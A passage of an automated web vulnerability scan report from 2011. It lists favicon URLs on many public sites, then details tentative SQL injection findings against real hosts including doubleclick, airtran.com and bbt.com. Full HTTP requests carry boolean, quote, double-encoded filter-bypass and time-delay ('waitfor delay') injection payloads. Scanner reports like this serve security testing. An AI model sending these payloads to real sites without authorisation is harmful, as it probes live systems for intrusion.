27.92. http://www.gamewinners.com/favicon.ico

27.93. http://www.gardenweb.com/favicon.ico

27.94. http://www.genealogy.com/favicon.ico

27.95. http://www.gossipcenter.com/favicon.ico

27.96. http://www.gourmandia.com/favicon.ico

27.97. http://www.greenwichmeantime.com/favicon.ico

27.98. http://www.harvard.edu/favicon.ico

27.99. http://www.hiexpress.com/favicon.ico

27.100. http://www.holidayinn.com/favicon.ico

27.101. http://www.hollywoodreporter.com/favicon.ico

27.102. http://www.home-remedies-for-you.com/favicon.ico

27.103. http://www.ichotelsgroup.com/favicon.ico

27.104. http://www.imagevenue.com/favicon.ico

27.105. http://www.inc.com/favicon.ico

27.106. http://www.infomash.org/favicon.ico

27.107. http://www.infowars.com/favicon.ico

27.108. http://www.ivillage.com/favicon.ico

27.109. http://www.jango.com/favicon.ico

27.110. http://www.jcwhitney.com/favicon.ico

27.111. http://www.joann.com/favicon.ico

27.112. http://www.jobsonline.net/favicon.ico

27.113. http://www.justia.com/favicon.ico

27.114. http://www.justluxe.com/favicon.ico

27.115. http://www.k12.com/favicon.ico

27.116. http://www.kazaa.com/favicon.ico

27.117. http://www.kcom.com/favicon.ico

27.118. http://www.kcom.com/favicon1.ico

27.119. http://www.kickapps.com/favicon.ico

27.120. http://www.lijit.com/favicon.ico

27.121. http://www.livevideo.com/favicon.ico

27.122. http://www.localpages.com/favicon.ico

27.123. http://www.localschooldirectory.com/favicon.ico

27.124. http://www.lowfares.com/favicon.ico

27.125. http://www.lunka.com/favicon.ico

27.126. http://www.mac.com/favicon.ico

27.127. http://www.maniatv.com/favicon.ico

27.128. http://www.mediaite.com/favicon.ico

27.129. http://www.medicalnewstoday.com/favicon.ico

27.130. http://www.mercurynews.com/favicon.ico

27.131. http://www.michigan.gov/favicon.ico

27.132. http://www.military.com/favicon.ico

27.133. http://www.miniclip.com/favicon.ico

27.134. http://www.mlive.com/favicon.ico

27.135. http://www.mochila.com/favicon.ico

27.136. http://www.music-oasis.com/favicon.ico

27.137. http://www.musiciansfriend.com/favicon.ico

27.138. http://www.myheritage.com/favicon.ico

27.139. http://www.mylifetime.com/favicon.ico

27.140. http://www.mylocalemployment.net/favicon.ico

27.141. http://www.mystart.com/favicon.ico

27.142. http://www.nationalreview.com/favicon.ico

27.143. http://www.netflix.com/favicon.ico

27.144. http://www.newgrounds.com/favicon.ico

27.145. http://www.newsdaily7.com/favicon.ico

27.146. http://www.newsok.com/favicon.ico

27.147. http://www.nextag.com/favicon.ico

27.148. http://www.northerntool.com/favicon.ico

27.149. http://www.oodle.com/favicon.ico

27.150. http://www.opportunity.co/favicon.ico

27.151. http://www.oprah.com/favicon.ico

27.152. http://www.orientaltrading.com/favicon.ico

27.153. http://www.ourstage.com/favicon.ico

27.154. http://www.ovguide.com/favicon.ico

27.155. http://www.partypoker.com/favicon.ico

27.156. http://www.payless.com/favicon.ico

27.157. http://www.pctools.com/favicon.ico

27.158. http://www.phoenix.edu/favicon.ico

27.159. http://www.phoneagentsource.com/favicon.ico

27.160. http://www.pittsburghlive.com/favicon.ico

27.161. http://www.playfin.com/favicon.ico

27.162. http://www.playstation.com/favicon.ico

27.163. http://www.playsushi.com/favicon.ico

27.164. http://www.politico.com/favicon.ico

27.165. http://www.polyvore.com/favicon.ico

27.166. http://www.popsugar.com/favicon.ico

27.167. http://www.poptropica.com/favicon.ico

27.168. http://www.potterybarn.com/favicon.ico

27.169. http://www.prlog.org/favicon.ico

27.170. http://www.pronto.com/favicon.ico

27.171. http://www.qualityhealth.com/favicon.ico

27.172. http://www.radaronline.com/favicon.ico

27.173. http://www.rawtube.com/favicon.ico

27.174. http://www.real.com/favicon.ico

27.175. http://www.rei.com/favicon.ico

27.176. http://www.rollingstone.com/favicon.ico

27.177. http://www.rottentomatoes.com/favicon.ico

27.178. http://www.rushlimbaugh.com/favicon.ico

27.179. http://www.salon.com/favicon.ico

27.180. http://www.samsung.com/favicon.ico

27.181. http://www.shutterfly.com/favicon.ico

27.182. http://www.smarter.com/favicon.ico

27.183. http://www.smugmug.com/favicon.ico

27.184. http://www.songlyrics.com/favicon.ico

27.185. http://www.sony.com/favicon.ico

27.186. http://www.space.com/favicon.ico

27.187. http://www.spanishdict.com/favicon.ico

27.188. http://www.squidoo.com/favicon.ico

27.189. http://www.staples.com/favicon.ico

27.190. http://www.suite101.com/favicon.ico

27.191. http://www.supercheats.com/favicon.ico

27.192. http://www.tagged.com/favicon.ico

27.193. http://www.takkle.com/favicon.ico

27.194. http://www.talkingpointsmemo.com/favicon.ico

27.195. http://www.techsupportforum.com/favicon.ico

27.196. http://www.thedailybeast.com/favicon.ico

27.197. http://www.thefrisky.com/favicon.ico

27.198. http://www.tinypic.com/favicon.ico

27.199. http://www.tomshardware.com/favicon.ico

27.200. http://www.toptenreviews.com/favicon.ico

27.201. http://www.trulia.com/favicon.ico

27.202. http://www.twitlonger.com/favicon.ico

27.203. http://www.umn.edu/favicon.ico

27.204. http://www.ups.com/favicon.ico

27.205. http://www.urbandictionary.com/favicon.ico

27.206. http://www.vast.com/favicon.ico

27.207. http://www.verisign.com/favicon.ico

27.208. http://www.vitals.com/favicon.ico

27.209. http://www.weather.gov/favicon.ico

27.210. http://www.webgains.com/favicon.ico

27.211. http://www.webkinz.com/favicon.ico

27.212. http://www.webring.org/favicon.ico

27.213. http://www.wired.com/favicon.ico

27.214. http://www.wnd.com/favicon.ico

27.215. http://www.woot.com/favicon.ico

27.216. http://www.worldwinner.com/favicon.ico

27.217. http://www.worthpoint.com/favicon.ico

27.218. http://www.wsbtv.com/favicon.ico

27.219. http://www.xomba.com/favicon.ico

27.220. http://www.yfrog.com/favicon.ico

27.221. http://www.yidio.com/favicon.ico

27.222. http://www.yourfilehost.com/favicon.ico

27.223. http://www.yuku.com/favicon.ico

27.224. http://www.zabasearch.com/favicon.ico

27.225. http://www.zmags.com/favicon.ico

28. Content type is not specified

28.1. http://www.4shared.com/favicon.ico

28.2. http://www.6pm.com/favicon.ico

28.3. http://www.bizrate.com/favicon.ico

28.4. http://www.blockbuster.com/favicon.ico

28.5. http://www.boldchat.com/favicon.ico

28.6. http://www.bookrags.com/favicon.ico

28.7. http://www.chacha.com/favicon.ico

28.8. http://www.dailymail.co.uk/favicon.ico

28.9. http://www.dominos.com/favicon.ico

28.10. http://www.gap.com/favicon.ico

28.11. http://www.hi5.com/favicon.ico

28.12. http://www.hotwire.com/favicon.ico

28.13. http://www.instructables.com/favicon.ico

28.14. http://www.jstor.org/favicon.ico

28.15. http://www.medcohealth.com/favicon.ico

28.16. http://www.mynewplace.com/favicon.ico

28.17. http://www.officedepot.com/favicon.ico

28.18. http://www.outbrain.com/favicon.ico

28.19. http://www.pogo.com/favicon.ico

28.20. http://www.retrevo.com/favicon.ico

28.21. http://www.rightathome.com/favicon.ico

28.22. http://www.savings.com/favicon.ico

28.23. http://www.shopzilla.com/favicon.ico

28.24. http://www.techbargains.com/favicon.ico

28.25. http://www.tracfone.com/favicon.ico

28.26. http://www.va.gov/favicon.ico

28.27. http://www.webs.com/favicon.ico

28.28. http://www.zappos.com/favicon.ico

29. SSL certificate



1. SQL injection  next
There are 12 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The adurl parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the adurl parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:36 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7132

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:22 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/cisco_webex_Together_AllText_728x90_r1.swf";
var gif = "http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrac
...[SNIP]...

Request 2

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:00:37 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:00:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7144

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jan 31 10:15:05 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.swf";
var gif = "http://s0.2mdn.net/2830766/Cisco_WebEx_FacetoFace_HQ_Banner_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.html%3FTrackID%3D1024051");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/19b/%2a/f%3B236250338%3B0-0%3B0%3B59487875%3B3454-728/90%3B40497957/40515744/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/next-meeting-hqvideo.htm
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The shv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the shv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
G1sL2Nyb3NzLXNpdGUtc2NyaXB0aW5nLXhzcy53d3cuY291cmNoZXZlbC5jb20uaHRtbKkCbbz1yg4Luz6oAwHIAxfoA6YD6AMf9QMAAADE&num=3&sig=AGiWqtxUeEkInJc9e-CqdzhYewXj-HfsJw&client=ca-pub-4063878933780912&adurl=http://www.exceptionalski.co.uk" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onmousedown="st('aw2')" onmouseover="return ss('','aw2')" target=_top title="www.exceptionalski.co.uk">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcross-site-scripting-xss.www.courchevel.com.html&dt=1301748825197&bpp=5&shv=r20110324%2527%2527&jsv=r20110321-2&correlator=1301748825485&frm=0&adk=1607234649&ga_vid=1342641436.1301748826&ga_sid=1301748826&ga_hid=1862808054&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&eid=33895132&fu=0&ifi=1&dtd=324&xpc=XYKSf8Neza&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:04:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4641

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.airtran.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx
Content-Type: text/html; charset=utf-8
Content-Length: 184
Cache-Control: private, max-age=548
Expires: Sat, 02 Apr 2011 14:12:54 GMT
Date: Sat, 02 Apr 2011 14:03:46 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2>
</body></html>

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airtran.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=600
Expires: Sat, 02 Apr 2011 14:13:47 GMT
Date: Sat, 02 Apr 2011 14:03:47 GMT
Content-Length: 10394
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20086 milliseconds to respond to the request, compared with 1023 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /favicon.ico'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 - Not Found
content-type: text/html
date: Sat, 02 Apr 2011 13:44:37 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15424
cache-control: private
x-powered-by: ASP.NET
Set-Cookie: AMWEBJCT!%2Fbbt!ASPSESSIONIDAASQCBAD=GLODNHDACIODPHHEBIKBIABD; Path=/
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/
Content-Length: 15564


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404err
...[SNIP]...

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealtime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: brc=www.dealtime.com; Domain=dealtime.com; Expires=Sun, 03-Apr-2011 13:39:15 GMT; Path=/
Set-Cookie: JSESSIONID=805851EED71FF6143D9FA848ECA7CB9A; Path=/
Set-Cookie: session=ts%3D2%5EPVS%3D1; Domain=.dealtime.com; Path=/
